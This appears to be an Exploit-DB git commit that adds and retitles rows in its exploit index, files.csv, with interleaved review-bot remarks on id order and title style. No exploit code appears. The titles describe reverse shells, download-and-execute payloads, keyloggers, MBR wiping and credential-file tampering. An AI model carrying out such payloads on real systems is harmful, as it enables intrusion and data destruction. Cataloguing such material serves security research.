DB: 2017-08-24

13 new exploits

libgig 4.0.0 - LinuxSampler Multiple Vulnerabilities

Microsoft Internet Explorer - wshom.ocx (Run) ActiveX Remote Code Execution (Add Admin)
Microsoft Internet Explorer - 'wshom.ocx' (Run) ActiveX Remote Code Execution (Add Admin)

Automated Logic WebCTRL 6.5 - Local Privilege Escalation

Microsoft Internet Explorer - (createTextRang) Download Shellcode Exploit (1)
Microsoft Internet Explorer - 'createTextRang' Download Shellcode Exploit (1)

Microsoft Internet Explorer - wshom.ocx ActiveX Control Remote Code Execution
Microsoft Internet Explorer - 'wshom.ocx' ActiveX Control Remote Code Execution

Easy File Management Web Server 5.3 - UserID Remote Buffer Overflow (ROP)
Easy File Management Web Server 5.3 - 'UserID' Remote Buffer Overflow (ROP)

Easy File Management Web Server 5.6 - USERID Remote Buffer Overflow
Easy File Management Web Server 5.6 - 'USERID' Remote Buffer Overflow

BSD/x86 - Bind TCP Shell (Random Port) Shellcode (143 bytes)
BSD/x86 - Bind TCP Shell (Random TCP Port) Shellcode (143 bytes)

FreeBSD/x86 - ConnectBack (172.17.0.9:8000/TCP) + Receive Shellcode + JMP + Return Results Null-Free Shellcode (90 bytes)
FreeBSD/x86 - ConnectBack (172.17.0.9:8000/TCP) + Receive Shellcode + Payload Loader + Return Results Null-Free Shellcode (90 bytes)

Linux/x86 - Bind TCP Shellcode (Generator)
Linux/x86 - Bind TCP Shell Shellcode (Generator)

Linux/x86 - Command Null-Free Shellcode (Generator)
Linux/x86 - Command Generator Null-Free Shellcode (Generator)

Cisco IOS/PowerPC - Bind Password (1rmp455) Shellcode (116 bytes)
Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes)

Linux/MIPS (Linksys WRT54G/GL) - execve Shellcode (60 bytes)
Linux/MIPS (Linksys WRT54G/GL) - execve(_/bin/sh__[_/bin/sh_]_[]); Shellcode (60 bytes)
Linux/x86 - Self-Modifying Anti-IDS Shellcode (64 bytes)
Linux/x86 - Forks a HTTP Server on 8800/TCP Shellcode (166 bytes)
Linux/x86 - Listens on 5555/TCP + Jumps to it Shellcode (83 bytes)
Linux/x86 - Self-Modifying Anti-IDS /bin/sh Shellcode (35/64 bytes)
Linux/x86 - HTTP Server (8800/TCP) + Fork Shellcode (166 bytes)
Linux/x86 - Bind TCP Listener (5555/TCP) + Receive Shellcode + Payload Loader Shellcode (83 bytes)

Linux/x86 - File Reader Shellcode (65+ bytes)
Linux/x86 - Read /etc/passwd Shellcode (65+ bytes)
Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) for full access Shellcode (86 bytes)
Linux/x86 - Ho' Detector - Promiscuous mode detector Shellcode (56 bytes)
Linux/x86 - Edit /etc/sudoers (ALL ALL=(ALL) NOPASSWD: ALL) For Full Access Shellcode (86 bytes)
Linux/x86 - Promiscuous Mode Detector Shellcode (56 bytes)

Linux/x86 - system-beep Shellcode (45 bytes)
Linux/x86 - System Beep Shellcode (45 bytes)

Linux/x86 - rm -rf / Attempts To Block The Process From Being Stopped Shellcode (132 bytes)
Linux/x86 - /bin/rm -rf / + Attempts To Block The Process From Being Stopped Shellcode (132 bytes)
Linux/x86 - raw-socket ICMP/checksum shell Shellcode (235 bytes)
Linux/x86 - Flush IPTables Rules (/sbin/iptables -F)  Shellcode (40 bytes)
Linux/x86 - kill all processes Shellcode (11 bytes)
Linux/x86 - Raw-Socket ICMP/Checksum /bin/sh Shell Shellcode (235 bytes)
Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (40 bytes)
Linux/x86 - Kill All Processes Shellcode (11 bytes)

Linux/x86 - HTTP/1.x GET + Downloads + execve() Null-Free Shellcode (111+ bytes)
Linux/x86 - Download File (HTTP/1.x http://0xdeadbeef/A) + execve() Null-Free Shellcode (111+ bytes)

Linux/x86 - re-use of /bin/sh string in .rodata Shellcode (16 bytes)
Linux/x86 - execve /bin/sh (Re-Use Of Strings In .rodata) Shellcode (16 bytes)
Linux/x86 - execve(/bin/sh) + .ZIP Header Shellcode (28 bytes)
Linux/x86 - execve(/bin/sh) + .RTF Header Shellcode (30 bytes)
Linux/x86 - execve(/bin/sh) + .RIFF Header Shellcode (28 bytes)
Linux/x86 - execve(/bin/sh) + .BMP Bitmap Header Shellcode (27 bytes)
Linux/x86 - Read SWAP write to /tmp/swr Shellcode (109 bytes)
Linux/x86 - SWAP store from /tmp/sws Shellcode (99 bytes)
Linux/x86 - execve(/bin/sh) + '.ZIP' Header Shellcode (28 bytes)
Linux/x86 - execve(/bin/sh) + '.RTF' Header Shellcode (30 bytes)
Linux/x86 - execve(/bin/sh) + '.RIFF' Header Shellcode (28 bytes)
Linux/x86 - execve(/bin/sh) + '.BMP' Bitmap Header Shellcode (27 bytes)
Linux/x86 - Read SWAP + Write To /tmp/swr Shellcode (109 bytes)
Linux/x86 - Read /tmp/sws + Store In SWAP Shellcode (99 bytes)
Linux/x86 - HTTP/1.x GET_ Downloads + JMP Shellcode (68+ bytes)
Linux/x86 - TCP Proxy Null-Free Shellcode (236 bytes)
Linux/x86 - Download File (HTTP/1.x http://127.0.0.1:8081/foobar.bin) + Receive Shellcode + Payload Loader Shellcode (68+ bytes)
Linux/x86 - TCP Proxy (192.168.1.16:1280) All Connect() Null-Free Shellcode (236 bytes)
Linux/x86 - eject cd-rom (follows /dev/cdrom symlink) + exit() Shellcode (40 bytes)
Linux/x86 - eject/close cd-rom loop (follows /dev/cdrom symlink) Shellcode (45 bytes)
Linux/x86 - Eject CD-Rom (Follows /dev/cdrom Symlink) + exit() Shellcode (40 bytes)
Linux/x86 - Eject/Close CD-Rom Loop (Follows /dev/cdrom Symlink) Shellcode (45 bytes)

Linux/x86 - normal exit with random (so to speak) return value Shellcode (5 bytes)
Linux/x86 - Normal Exit With Random (So To Speak) Return Value Shellcode (5 bytes)

Linux/x86 - Socket-proxy Shellcode (372 bytes)
Linux/x86 - Socket-Proxy (31337:11.22.33.44:80) Shellcode (372 bytes)

Linux/x86 - snoop /dev/dsp Null-Free Shellcode (172 bytes)
Linux/x86 - Snoop /dev/dsp Null-Free Shellcode (172 bytes)
Linux/x86 - examples of long-term payloads hide-wait-change Shellcode (.s) (187+ bytes)
Linux/x86 - examples of long-term payloads hide-wait-change Shellcode (187+ bytes)
Linux/x86 - Hide-Wait-Change (Hide from PS + Wait for /tmp/foo + chmod 0455) Shellcode (187+ bytes)
Linux/x86 - Radically Self-Modifying Shellcode (70 bytes)
Linux/x86 - Magic Byte Self-Modifying Shellcode (76 bytes)
Linux/x86 - Self-Modifying Radical Shellcode (70 bytes)
Linux/x86 -  Self-Modifying Magic Byte /bin/sh Shellcode (76 bytes)

Linux/x86 - execve /bin/sh IA32 0xff-less Shellcode (45 bytes)
Linux/IA32 - execve /bin/sh 0xff-Free Shellcode (45 bytes)

Linux/x86 - kill snort Shellcode (151 bytes)
Linux/x86 - Kill Snort Shellcode (151 bytes)
Linux/x86 - Flush IPTables Rules (/sbin/iptables -F)  Shellcode (45 bytes)
Linux/x86 - Flush IPTables Rules (/sbin/iptables -F)  Shellcode (58 bytes)
Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (45 bytes)
Linux/x86 - Flush IPTables Rules (/sbin/iptables -F) Shellcode (58 bytes)
Linux/x86 - eject /dev/cdrom Shellcode (64 bytes)
Linux/x86 - xterm -ut -display [IP]:0 Shellcode (132 bytes)
Linux/x86 - ipchains -F Shellcode (49 bytes)
Linux/x86 - Eject /dev/cdrom Shellcode (64 bytes)
Linux/x86 - xterm -ut -display 1270.0.0.1:0 Shellcode (132 bytes)
Linux/x86 - Flush IPChains Rules (/sbin/ipchains -F) Shellcode (49 bytes)

Linux/x86 - execve /bin/sh (tolower() Evasion) Shellcode (41 bytes)
Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (41 bytes)

Linux/x86 - execve /bin/sh (toupper() Evasion) Shellcode (55 bytes)
Linux/x86 - execve /bin/sh ToLower Encoded Shellcode (55 bytes)
NetBSD/x86 - kill all processes Shellcode (23 bytes)
NetBSD/x86 - Callback 6666/TCP Shellcode (83 bytes)
NetBSD/x86 - Kill All Processes Shellcode (23 bytes)
NetBSD/x86 - Reverse TCP Shell (6666/TCP) Shellcode (83 bytes)
OSX/PPC - Add inetd backdoor Shellcode (222 bytes)
OSX/PPC - reboot Shellcode (28 bytes)
OSX/PPC - Add inetd (/etc/inetd.conf) Backdoor (Bind 6969/TCP Shell) Shellcode (222 bytes)
OSX/PPC - Reboot Shellcode (28 bytes)
OSX/PPC - create /tmp/suid Shellcode (122 bytes)
OSX/PPC - simple write() Shellcode (75 bytes)
OSX/PPC - Create /tmp/suid Shellcode (122 bytes)
OSX/PPC - Simple write() Shellcode (75 bytes)

Solaris/SPARC - Download File + Execute Shellcode (278 bytes)
Solaris/SPARC - Download File (http://evil-dl/) + Execute (/tmp/ff) Shellcode (278 bytes)

Solaris/SPARC - Bind TCP /bin/sh (6789/TCP) Shellcode (228 bytes)
Solaris/SPARC - Bind TCP /bin/sh Shell (6789/TCP) Shellcode (228 bytes)

Solaris/x86 - Bind TCP Shellcode (Generator)
Solaris/x86 - Bind TCP Shell Shellcode (Generator)
Solaris/x86 - execve /bin/sh toupper evasion Shellcode (84 bytes)
Solaris/x86 - Add services and execve inetd Shellcode (201 bytes)
Solaris/x86 - execve /bin/sh ToUpper Encoded Shellcode (84 bytes)
Solaris/x86 - inetd Add Service + execve Shellcode (201 bytes)
Windows x64 - (URLDownloadToFileA) Download + Execute Shellcode (218+ bytes)
Linux/x86 - kill all processes Shellcode (9 bytes)
Windows x64 - (URLDownloadToFileA) Download File (http://localhost/trojan.exe) + Execute Shellcode (218+ bytes)
Linux/x86 - Kill All Processes Shellcode (9 bytes)

Linux/x86 - Pverwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)
Linux/x86 - Overwrite MBR on /dev/sda with _LOL!' Shellcode (43 bytes)

Linux/x86 - eject /dev/cdrom Shellcode (42 bytes)
Linux/x86 - Eject /dev/cdrom Shellcode (42 bytes)

Linux/x86 - Disabled modsecurity Shellcode (64 bytes)
Linux/x86 - Disable modsecurity Shellcode (64 bytes)

Linux/x86 - chmod  0777 /etc/shadow Shellcode (33 bytes)
Linux/x86 - chmod 0777 /etc/shadow Shellcode (33 bytes)
Solaris/x86 - Download File Shellcode (79 bytes)
Linux/x86 -  Disable ASLR Security Shellcode Shellcode (106 bytes)
Solaris/x86 - Download File (http://shell-storm.org/exemple-solaris) Shellcode (79 bytes)
Linux/x86 - Disable ASLR Security Shellcode (106 bytes)

Linux/x86 - kill all running process Shellcode (11 bytes)
Linux/x86 - Kill All Running Process Shellcode (11 bytes)

Solaris/x86 - SystemV killall command Shellcode (39 bytes)
Solaris/x86 - SystemV killall Command Shellcode (39 bytes)

Windows x86 - Checksum Routine Shellcode (18 bytes)
Windows x86 - Egghunter Checksum Routine Shellcode (18 bytes)
ARM - Bind (68/UDP) + Reverse Shell (192.168.0.1:67/UDP) Shellcode
ARM - Loader (0x1337/TCP) Shellcode
ARM - Bind TCP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/UDP) Shellcode
ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode
Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69 bytes)
OSX/Intel (x86-64) - Reverse TCP /bin/sh Shell (FFFFFFFF:4444/TCP) Shellcode (131 bytes)
Linux/x86 - Bind Netcat (/usr/bin/netcat) /bin/sh Shell (6666/TCP) + Polymorphic XOR Encoded Shellcode (69/93 bytes)
OSX/Intel x86-64 - Reverse TCP /bin/sh Shell (FFFFFFFF:4444/TCP) Shellcode (131 bytes)
OSX - Universal ROP Shellcode
Linux/MIPS - execve Shellcode (52 bytes)
OSX - Universal ROP + Reverse TCP Shell Shellcode
Linux/MIPS - execve /bin/sh Shellcode (52 bytes)

Windows x86 - Bind TCP Password (damn_it!$$##@;*#) Shellcode (637 bytes)
Windows x86 - Bind TCP Password (damn_it!$$##@;*#) Shell Shellcode (637 bytes)

Windows - URLDownloadToFile + WinExec + ExitProcess Shellcode
Windows - URLDownloadToFile (http://bflow.security-portal.cz/down/xy.txt) + WinExec + ExitProcess Shellcode

Linux/x86 - Socket Re-use Shellcode (50 bytes)
Linux/x86 - execve /bin/sh + Socket Re-Use Shellcode (50 bytes)

Linux/x86-64 - Position independent + execve(_/bin/sh\0__NULL_NULL); Alphanumeric Shellcode (87 bytes)
Linux/x86-64 - execve(_/bin/sh\0__NULL_NULL);  Position Independent Alphanumeric Shellcode (87 bytes)

Linux/x86-64 - Reads Data From /etc/passwd To /tmp/outfile Shellcode (118 bytes)
Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (118 bytes)

Linux/x86 - execve _/bin/sh_ Shellcode (35 bytes)
Linux/x86 - execve /bin/sh Shellcode (35 bytes)
Linux/x86 - Execve /bin/sh Via Push Shellcode (21 bytes)
Linux/x86-64 - Execve /bin/sh Via Push Shellcode (23 bytes)
Linux/x86 - execve /bin/sh Via Push Shellcode (21 bytes)
Linux/x86-64 - execve /bin/sh Via Push Shellcode (23 bytes)

Linux/x86 - execve _/bin/sh_ Shellcode (26 bytes)
Linux/x86 - execve /bin/sh Shellcode (26 bytes)

Linux/x86 - /etc/passwd Reader Shellcode (58 bytes)
Linux/x86 - Read /etc/passwd Shellcode (58 bytes)

Linux/x86 - execve _/bin/sh_ Shellcode (24 bytes)
Linux/x86 - execve /bin/sh Shellcode (24 bytes)

Linux x86/x86-64 - Bind Shell (4444/TCP) Shellcode (251 bytes)
Linux x86/x86-64 - Bind TCP Shell (4444/TCP) Shellcode (251 bytes)

Linux/x86-64 - Execve-Stack Polymorphic Shellcode (47 bytes)
Linux/x86-64 - execve Stack Polymorphic Shellcode (47 bytes)
Linux/x86-64 - Bind Shell Shellcode (Generator)
Windows - Primitive Keylogger to File Null-Free Shellcode (431 (0x01AF) bytes)
Linux/x86-64 - Bind TCP Shell Shellcode (Generator)
Windows - Keylogger to File (./log.bin) Null-Free Shellcode (431 bytes)

Windows - Functional Keylogger to File Null-Free Shellcode (601 (0x0259) bytes)
Windows - Keylogger to File (%TEMP%/log.bin) Null-Free Shellcode (601 bytes)

Linux/x86-64 - Information Stealer Shellcode (399 bytes)
Linux/x86-64 - Download File (http://192.168.30.129/pri.sh) + Execute Used To Steal Information Shellcode (399 bytes)

Linux/x86 - Reverse TCP /bin/sj Shell (192.168.227.129:4444) Shellcode (75 bytes)
Linux/x86 - Reverse TCP /bin/sh Shell (192.168.227.129:4444) Shellcode (75 bytes)

Windows x64 - Download File + Execute Shellcode (358 bytes)
Windows x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:\Users\Public\p.exe) Shellcode (358 bytes)

Linux/x86-64 - Random Listener Shellcode (54 bytes)
Linux/x86-64 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (54 bytes)

Linux/x86-64 - Setuid(0) + Execve(/bin/sh) Polymorphic Shellcode (31 bytes)
Linux/x86-64 - setuid(0) + Execve(/bin/sh) Polymorphic Shellcode (31 bytes)
Linux/x86 - Bind TCP /bin/sh Random Port Shell Shellcode (44 bytes)
Linux/x86 - File Reader Shellcode (54 Bytes)
Linux/x86 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (44 bytes)
Linux/x86 - Read /etc/passwd Shellcode (54 Bytes)

Matrimonial Script - SQL Injection

Automated Logic WebCTRL 6.5 - Unrestricted File Upload / Remote Code Execution

Automated Logic WebCTRL 6.1 - Path Traversal / Arbitrary File Write

iTech B2B Script 4.42 - SQL Injection
iTech Business Networking Script 8.26 - SQL Injection
iTech Caregiver Script 2.71 - SQL Injection
iTech Classifieds Script 7.41 - SQL Injection
iTech Image Sharing Script 4.13 - SQL Injection
iTech Freelancer Script 5.27 - SQL Injection
iTech Travel Script 9.49 - SQL Injection
iTech Multi Vendor Script 6.63 - SQL Injection
Offensive Security 2017-08-24 05:01:22 +00:00
parent c7b4bfd8e6
commit dd6e8a4e4c
15 changed files with 1402 additions and 101 deletions

215
files.csv

@ -5662,6 +5662,7 @@ id,file,description,date,author,platform,type,port
42483,platforms/windows/dos/42483.py,"MyDoomScanner 1.00 - Local Buffer Overflow (PoC)",2017-08-17,"Anurag Srivastava",windows,dos,0 42483,platforms/windows/dos/42483.py,"MyDoomScanner 1.00 - Local Buffer Overflow (PoC)",2017-08-17,"Anurag Srivastava",windows,dos,0
42486,platforms/windows/dos/42486.py,"DSScan 1.0 - Local Buffer Overflow (PoC)",2017-08-18,"Anurag Srivastava",windows,dos,0 42486,platforms/windows/dos/42486.py,"DSScan 1.0 - Local Buffer Overflow (PoC)",2017-08-18,"Anurag Srivastava",windows,dos,0
42495,platforms/windows/dos/42495.py,"MessengerScan 1.05 - Local Buffer Overflow (PoC)",2017-08-18,"Anurag Srivastava",windows,dos,0 42495,platforms/windows/dos/42495.py,"MessengerScan 1.05 - Local Buffer Overflow (PoC)",2017-08-18,"Anurag Srivastava",windows,dos,0
42546,platforms/linux/dos/42546.txt,"libgig 4.0.0 - LinuxSampler Multiple Vulnerabilities",2017-08-23,qflb.wu,linux,dos,0
42518,platforms/hardware/dos/42518.txt,"NoviFlow NoviWare < NW400.2.6 - Multiple Vulnerabilities",2017-08-18,"François Goichon",hardware,dos,0 42518,platforms/hardware/dos/42518.txt,"NoviFlow NoviWare < NW400.2.6 - Multiple Vulnerabilities",2017-08-18,"François Goichon",hardware,dos,0
3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0 3,platforms/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Privilege Escalation",2003-03-30,"Wojciech Purczynski",linux,local,0
4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0 4,platforms/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Buffer Overflow",2003-04-01,Andi,solaris,local,0
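Review bot: The new row 42546 is inserted between 42495 and 42518, so the ids in this dos block are no longer ascending (42495, 42546, 42518). If files.csv is meant to stay sorted by id within each type, move the libgig row after 42518; if the placement is deliberate, say so in the commit message so tools that rely on the ordering are not surprised.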
@ -6674,7 +6675,7 @@ id,file,description,date,author,platform,type,port
11205,platforms/windows/local/11205.pl,"MP3 Studio 1.x - '.m3u' Local Stack Overflow (Universal)",2010-01-20,"D3V!L FUCKER",windows,local,0 11205,platforms/windows/local/11205.pl,"MP3 Studio 1.x - '.m3u' Local Stack Overflow (Universal)",2010-01-20,"D3V!L FUCKER",windows,local,0
11208,platforms/windows/local/11208.pl,"jetAudio 8.0.0.2 Basic - '.m3u' Stack Overflow",2010-01-21,cr4wl3r,windows,local,0 11208,platforms/windows/local/11208.pl,"jetAudio 8.0.0.2 Basic - '.m3u' Stack Overflow",2010-01-21,cr4wl3r,windows,local,0
11219,platforms/windows/local/11219.pl,"SOMPL Player 1.0 - Buffer Overflow",2010-01-22,Rick2600,windows,local,0 11219,platforms/windows/local/11219.pl,"SOMPL Player 1.0 - Buffer Overflow",2010-01-22,Rick2600,windows,local,0
11229,platforms/windows/local/11229.txt,"Microsoft Internet Explorer - wshom.ocx (Run) ActiveX Remote Code Execution (Add Admin)",2010-01-22,Stack,windows,local,0 11229,platforms/windows/local/11229.txt,"Microsoft Internet Explorer - 'wshom.ocx' (Run) ActiveX Remote Code Execution (Add Admin)",2010-01-22,Stack,windows,local,0
11232,platforms/windows/local/11232.c,"Authentium SafeCentral 2.6 - 'shdrv.sys' Local Kernel Ring0 SYSTEM Exploit",2010-01-22,mu-b,windows,local,0 11232,platforms/windows/local/11232.c,"Authentium SafeCentral 2.6 - 'shdrv.sys' Local Kernel Ring0 SYSTEM Exploit",2010-01-22,mu-b,windows,local,0
11255,platforms/windows/local/11255.pl,"Winamp 5.572 - 'whatsnew.txt' Stack Overflow",2010-01-25,Dz_attacker,windows,local,0 11255,platforms/windows/local/11255.pl,"Winamp 5.572 - 'whatsnew.txt' Stack Overflow",2010-01-25,Dz_attacker,windows,local,0
11256,platforms/windows/local/11256.pl,"Winamp 5.572 (Windows XP SP3 DE) - 'whatsnew.txt' Local Buffer Overflow",2010-01-25,NeoCortex,windows,local,0 11256,platforms/windows/local/11256.pl,"Winamp 5.572 (Windows XP SP3 DE) - 'whatsnew.txt' Local Buffer Overflow",2010-01-25,NeoCortex,windows,local,0
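Review bot: In row 11229 only wshom.ocx is quoted; "(Run)" stays in parentheses, while this same commit turns "(createTextRang)" into a quoted name in row 1607. Pick one convention for method names and apply it here too. The title also says Remote Code Execution while the path and type columns are windows/local, which is worth reconciling in the same pass.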
@ -9187,6 +9188,7 @@ id,file,description,date,author,platform,type,port
42274,platforms/lin_x86/local/42274.c,"Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap' 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0 42274,platforms/lin_x86/local/42274.c,"Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap' 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0
42275,platforms/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64' 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86-64,local,0 42275,platforms/lin_x86-64/local/42275.c,"Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64' 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86-64,local,0
42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0 42276,platforms/lin_x86/local/42276.c,"Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",lin_x86,local,0
42542,platforms/windows/local/42542.txt,"Automated Logic WebCTRL 6.5 - Local Privilege Escalation",2017-08-22,LiquidWorm,windows,local,0
42310,platforms/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Privilege Escalation",2017-07-10,LiquidWorm,windows,local,0 42310,platforms/windows/local/42310.txt,"Pelco VideoXpert 1.12.105 - Privilege Escalation",2017-07-10,LiquidWorm,windows,local,0
42325,platforms/windows/local/42325.py,"Counter Strike: Condition Zero - '.BSP' Map File Code Execution",2017-07-07,"Grant Hernandez",windows,local,0 42325,platforms/windows/local/42325.py,"Counter Strike: Condition Zero - '.BSP' Map File Code Execution",2017-07-07,"Grant Hernandez",windows,local,0
42334,platforms/macos/local/42334.txt,"Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Root Privilege Escalation",2017-07-18,"Mark Wadham",macos,local,0 42334,platforms/macos/local/42334.txt,"Hashicorp vagrant-vmware-fusion < 4.0.20 - Local Root Privilege Escalation",2017-07-18,"Mark Wadham",macos,local,0
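Review bot: Row 42542 is placed between 42276 and 42310, which breaks the ascending id order of the surrounding local entries; it belongs after the 423xx rows if the block is sorted by id. Its neighbour 42310 by the same author is titled "Privilege Escalation" while this one reads "Local Privilege Escalation"; the type column already says local, so the wording of the two could match.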
@ -9656,7 +9658,7 @@ id,file,description,date,author,platform,type,port
1592,platforms/windows/remote/1592.c,"Mercur MailServer 5.0 SP3 - (IMAP) Remote Buffer Overflow (1)",2006-03-19,pLL,windows,remote,0 1592,platforms/windows/remote/1592.c,"Mercur MailServer 5.0 SP3 - (IMAP) Remote Buffer Overflow (1)",2006-03-19,pLL,windows,remote,0
1602,platforms/multiple/remote/1602.c,"BomberClone < 0.11.6.2 - (Error Messages) Remote Buffer Overflow",2006-03-22,"esca zoo",multiple,remote,11000 1602,platforms/multiple/remote/1602.c,"BomberClone < 0.11.6.2 - (Error Messages) Remote Buffer Overflow",2006-03-22,"esca zoo",multiple,remote,11000
1606,platforms/windows/remote/1606.html,"Microsoft Internet Explorer - (createTextRang) Remote Code Execution",2006-03-23,darkeagle,windows,remote,0 1606,platforms/windows/remote/1606.html,"Microsoft Internet Explorer - (createTextRang) Remote Code Execution",2006-03-23,darkeagle,windows,remote,0
1607,platforms/windows/remote/1607.cpp,"Microsoft Internet Explorer - (createTextRang) Download Shellcode Exploit (1)",2006-03-23,ATmaCA,windows,remote,0 1607,platforms/windows/remote/1607.cpp,"Microsoft Internet Explorer - 'createTextRang' Download Shellcode Exploit (1)",2006-03-23,ATmaCA,windows,remote,0
1620,platforms/windows/remote/1620.pm,"Microsoft Internet Explorer - (createTextRang) Remote Exploit (Metasploit)",2006-04-01,"Randy Flood",windows,remote,0 1620,platforms/windows/remote/1620.pm,"Microsoft Internet Explorer - (createTextRang) Remote Exploit (Metasploit)",2006-04-01,"Randy Flood",windows,remote,0
1626,platforms/windows/remote/1626.pm,"PeerCast 0.1216 - Remote Buffer Overflow (Metasploit)",2006-03-30,"H D Moore",windows,remote,7144 1626,platforms/windows/remote/1626.pm,"PeerCast 0.1216 - Remote Buffer Overflow (Metasploit)",2006-03-30,"H D Moore",windows,remote,7144
1628,platforms/windows/remote/1628.cpp,"Microsoft Internet Explorer - (createTextRang) Download Shellcode Exploit (2)",2006-03-31,ATmaCA,windows,remote,0 1628,platforms/windows/remote/1628.cpp,"Microsoft Internet Explorer - (createTextRang) Download Shellcode Exploit (2)",2006-03-31,ATmaCA,windows,remote,0
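Review bot: Only row 1607 gets the quoted form; rows 1606, 1620 and 1628 in the same context still read "(createTextRang)", including 1628, the "(2)" companion of this entry. Rename all four together so a search on either spelling returns the whole set. The name also looks truncated (the Internet Explorer method is createTextRange), so this would be the moment to correct it.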
@ -10637,7 +10639,7 @@ id,file,description,date,author,platform,type,port
11027,platforms/windows/remote/11027.pl,"Apple QuickTime 7.2/7.3 - RTSP Buffer Overflow (Perl)",2010-01-06,jacky,windows,remote,0 11027,platforms/windows/remote/11027.pl,"Apple QuickTime 7.2/7.3 - RTSP Buffer Overflow (Perl)",2010-01-06,jacky,windows,remote,0
11059,platforms/windows/remote/11059.html,"JcomBand toolbar on IE - ActiveX Buffer Overflow",2010-01-07,"germaya_x and D3V!L FUCKER",windows,remote,0 11059,platforms/windows/remote/11059.html,"JcomBand toolbar on IE - ActiveX Buffer Overflow",2010-01-07,"germaya_x and D3V!L FUCKER",windows,remote,0
11138,platforms/windows/remote/11138.c,"Apple iTunes 8.1.x - (daap) Buffer Overflow Remote Exploit",2010-01-14,Simo36,windows,remote,0 11138,platforms/windows/remote/11138.c,"Apple iTunes 8.1.x - (daap) Buffer Overflow Remote Exploit",2010-01-14,Simo36,windows,remote,0
11151,platforms/windows/remote/11151.html,"Microsoft Internet Explorer - wshom.ocx ActiveX Control Remote Code Execution",2010-01-16,"germaya_x and D3V!L FUCKER",windows,remote,0 11151,platforms/windows/remote/11151.html,"Microsoft Internet Explorer - 'wshom.ocx' ActiveX Control Remote Code Execution",2010-01-16,"germaya_x and D3V!L FUCKER",windows,remote,0
11167,platforms/windows/remote/11167.py,"Microsoft Internet Explorer 6 - Aurora Exploit",2010-01-17,"Ahmed Obied",windows,remote,0 11167,platforms/windows/remote/11167.py,"Microsoft Internet Explorer 6 - Aurora Exploit",2010-01-17,"Ahmed Obied",windows,remote,0
11172,platforms/windows/remote/11172.html,"Adobe GetPlus get_atlcom 1.6.2.48 - ActiveX Remote Execution (PoC)",2010-01-17,superli,windows,remote,0 11172,platforms/windows/remote/11172.html,"Adobe GetPlus get_atlcom 1.6.2.48 - ActiveX Remote Execution (PoC)",2010-01-17,superli,windows,remote,0
11173,platforms/windows/remote/11173.txt,"Trend Micro Web-Deployment - ActiveX Remote Execution (PoC)",2010-01-17,superli,windows,remote,0 11173,platforms/windows/remote/11173.txt,"Trend Micro Web-Deployment - ActiveX Remote Execution (PoC)",2010-01-17,superli,windows,remote,0
@ -14728,7 +14730,7 @@ id,file,description,date,author,platform,type,port
33599,platforms/linux/remote/33599.txt,"Samba 3.4.5 - Symlink Directory Traversal",2010-02-04,kingcope,linux,remote,0 33599,platforms/linux/remote/33599.txt,"Samba 3.4.5 - Symlink Directory Traversal",2010-02-04,kingcope,linux,remote,0
33600,platforms/multiple/remote/33600.rb,"Oracle 10g - Multiple Privilege Escalation Vulnerabilities",2010-02-05,"David Litchfield",multiple,remote,0 33600,platforms/multiple/remote/33600.rb,"Oracle 10g - Multiple Privilege Escalation Vulnerabilities",2010-02-05,"David Litchfield",multiple,remote,0
33601,platforms/multiple/remote/33601.rb,"Oracle 11g - Multiple Privilege Escalation Vulnerabilities",2010-02-05,"David Litchfield",multiple,remote,0 33601,platforms/multiple/remote/33601.rb,"Oracle 11g - Multiple Privilege Escalation Vulnerabilities",2010-02-05,"David Litchfield",multiple,remote,0
33610,platforms/windows/remote/33610.py,"Easy File Management Web Server 5.3 - UserID Remote Buffer Overflow (ROP)",2014-06-01,"Julien Ahrens",windows,remote,80 33610,platforms/windows/remote/33610.py,"Easy File Management Web Server 5.3 - 'UserID' Remote Buffer Overflow (ROP)",2014-06-01,"Julien Ahrens",windows,remote,80
